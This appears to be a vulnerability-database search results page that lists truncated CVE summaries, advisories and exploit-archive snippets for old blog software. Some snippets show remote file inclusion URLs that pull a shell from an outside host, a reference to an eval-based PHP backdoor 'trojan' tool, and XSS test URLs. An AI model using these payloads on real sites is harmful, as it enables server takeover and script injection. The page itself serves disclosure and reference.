7698 matches found
CVE-2007-0150
Multiple PHP remote file inclusion vulnerabilities in index.php in Dayfox Blog allow remote attackers to execute arbitrary PHP code via a URL in the (1) page, (2) subject, and (3) q parameters...
CVE-2007-0150
CVE-2007-0150 affects Dayfox Blog’s index.php, with multiple PHP remote file inclusion vulnerabilities exploitable via user-supplied URL parameters (page, subject, q). The vulnerability stems from unsafely including remote content based on these parameters, allowing an attacker to execute arbitra...
CVE-2007-0121
Cross-site scripting (XSS) vulnerability in search.asp in RI Blog 1.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter...
CVE-2007-0121
CVE-2007-0121 is an XSS vulnerability in RI Blog 1.3 (search.asp) that allows remote attackers to inject arbitrary script/HTML via the q parameter. Public records cite a CVSS v2 base score of 6.8 (Medium), with network attack vector and partial impact to confidentiality, integrity, and availabili...
Dayfox Blog Remote File Include Vuln.
BhhGroup.Org & Bilgi-Yonetimi.Org.Tr script name : Dayfox Blog Script Download : http://hotscripts.com/Detailed/66344.html Risk : High Found By : ShaFuck31 Vulnerable file : index.php Vuln : http://www.victim.com/ScriptPath/index.php?page=sheLL...
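WordPress Charset Decoding SQL Injection Vulnerability
WordPress is a popular blogging program. WordPress has a flaw in how it handles character set decoding, which remote attackers can exploit to carry out SQL injection attacks and obtain sensitive information. When PHP's mbstring extension is enabled, WordPress supports decoding Trackbacks in different character sets; because the decoding takes place before the database selects the correct character set for the input data, protections against SQL injection can be bypassed. For demonstration purposes, Stefan Esser suggests using the UTF-7 character set for exploitation, because other multibyte character sets allow multibyte sequences to end with ''...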
riblog-xss.txt
BhhGroup.Org & Bilgi-Yonetimi.Org.Tr script name : RI Blog 1.3 Script Download : http://www.aspindir.com/indir.asp?id=4098 Risk : High Found By : ShaFuck31 Vulnerable file : search.asp Vulnerable : http://www.victim.com/BlogPath/search.asp?q=XSS ExampLe :...
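Easy Blog Doc_Directory Remote File Inclusion Vulnerability
Easy Blog is a PHP-based blogging program. Easy Blog does not properly filter user-submitted URI data, and remote attackers can exploit this to execute arbitrary commands with the privileges of the web process. The problem is that multiple scripts lack filtering of the user-submitted 'DocDirectory' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with the privileges of the web process. OpenDock Easy Blog 1.4. No detailed solution is currently available; please watch the following link: http://web.opendock.net/index.php/ln/it/idp/40.html...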
RI Blog 1.3 XSS Vuln.
BhhGroup.Org & Bilgi-Yonetimi.Org.Tr script name : RI Blog 1.3 Script Download : http://www.aspindir.com/indir.asp?id=4098 Risk : High Found By : ShaFuck31 Vulnerable file : search.asp Vulnerable : http://www.victim.com/BlogPath/search.asp?q=XSS ExampLe :...
RI Blog 1.3 - 'search.asp' Cross-Site Scripting
source: https://www.securityfocus.com/bid/21880/info RI Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user...
CVE-2006-6830
The CVE-2006-6830 entry describes a PHP remote file inclusion in b2 Blog 0.5 and earlier (b2verifauth.php) that lets an attacker execute arbitrary PHP code via the index parameter. Affected software: b2 Blog up to version 0.5 and earlier. Root cause: improper handling of the index URL parameter e...
BO-BLOG vulnerability: one-sentence trojan submission tool [html] - vulnerability warning - the black bar safety net
Belongs to type: Web Apps. The following procedures (methods) may be offensive; they are for security research and teaching purposes. At your own risk! Code: ! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" HTMLHEADTITLEThe Csript For The "? php eval$POSTcmd?& gt;" /TITLE META...
CVE-2006-6830
PHP remote file inclusion vulnerability in b2verifauth.php in b2 Blog 0.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the index parameter...
Netease blog logic vulnerability: teaching you to make a stealth blog - vulnerability warning - the black bar safety net
http://blog.163.com Assume that the user name is abcd. Then the blog address is http://blog.163.com/abcd. According to this rule, and knowing that the Netease blog login page is http://blog.163.com/login.html, and because Netease blog allows user names containing a dot (.), I registered the user name login.html. According to the above logic,...
CVE-2006-6729
Cross-site scripting (XSS) vulnerability in a-blog 1.51 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors...
[SA23444] a-blog Cross-Site Scripting Vulnerability
TITLE: a-blog Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA23444 VERIFY ADVISORY: http://secunia.com/advisories/23444/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: a-blog 1.x http://secunia.com/product/12949/ DESCRIPTION: Fukumori has reported a...
b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion
b2 - 0.5 index Remote File Include +class : Remote File Include Vulnerability + +Author : mdx +Files : +b2verifauth.php? +code : + + include$index; + + Exploit : ++ + http://www.site./path/b2verifauth.php?index=http://mdxshell.txt? +...
b2 Blog <= 0.5 (b2verifauth.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications. b2 Blog <= 0.5 (b2verifauth.php) Remote File Include Vulnerability. b2 - 0.5 index Remote File Include +class...